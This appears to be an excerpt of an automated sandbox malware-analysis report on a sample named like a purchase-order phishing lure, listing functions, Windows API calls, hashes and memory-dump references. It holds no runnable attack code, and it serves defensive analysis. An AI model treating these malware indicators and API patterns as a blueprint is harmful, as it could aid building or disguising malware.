                                                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                            • __amsg_exit.LIBCMT ref: 004170AE
                                                            • __lock.LIBCMT ref: 004170BE
                                                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                            • _free.LIBCMT ref: 004170EE
                                                            • InterlockedIncrement.KERNEL32(00A02D28), ref: 00417106
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                            • String ID:
                                                            • API String ID: 3470314060-0
                                                            • Opcode ID: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                            • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                            • Opcode Fuzzy Hash: 24516f4010ce0b93e8566e6a8de288d1d1524a4de8e6263f522fbb499f39661f
                                                            • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                            Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                            • String ID:
                                                            • API String ID: 3495660284-0
                                                            • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                            • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                            • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                            Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                            • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                            • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                            Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                            • ExitThread.KERNEL32 ref: 004151ED
                                                            • __freefls@4.LIBCMT ref: 00415209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                            • String ID:
                                                            • API String ID: 442100245-0
                                                            • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                            • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                            • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                            Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                            • _wcslen.LIBCMT ref: 0045F94A
                                                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                            • String ID: 0
                                                            • API String ID: 621800784-4108050209
                                                            • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                            • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                            • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                            Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SetErrorMode.KERNEL32 ref: 004781CE
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • SetErrorMode.KERNEL32(?), ref: 00478270
                                                            • SetErrorMode.KERNEL32(?), ref: 00478340
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                            • String ID: \VH
                                                            • API String ID: 3884216118-234962358
                                                            • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                            • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                            • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                            Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                            • IsMenu.USER32(?), ref: 0044854D
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                            • DrawMenuBar.USER32 ref: 004485AF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert
                                                            • String ID: 0
                                                            • API String ID: 3076010158-4108050209
                                                            • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                            • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                            • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                            Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 1589278365-1403004172
                                                            • Opcode ID: acd92c5f85bdaaaa2466511ae3885981b3e9fa80dd98d811b4eaed8c03ab0688
                                                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                            • Opcode Fuzzy Hash: acd92c5f85bdaaaa2466511ae3885981b3e9fa80dd98d811b4eaed8c03ab0688
                                                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                            Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                            Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Handle
                                                            • String ID: nul
                                                            • API String ID: 2519475695-2873401336
                                                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                            Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: SysAnimate32
                                                            • API String ID: 0-1011021900
                                                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                            Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                            • GetFocus.USER32 ref: 0046157B
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                            • __swprintf.LIBCMT ref: 00461608
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                            • String ID: %s%d
                                                            • API String ID: 2645982514-1110647743
                                                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                            Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                            Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
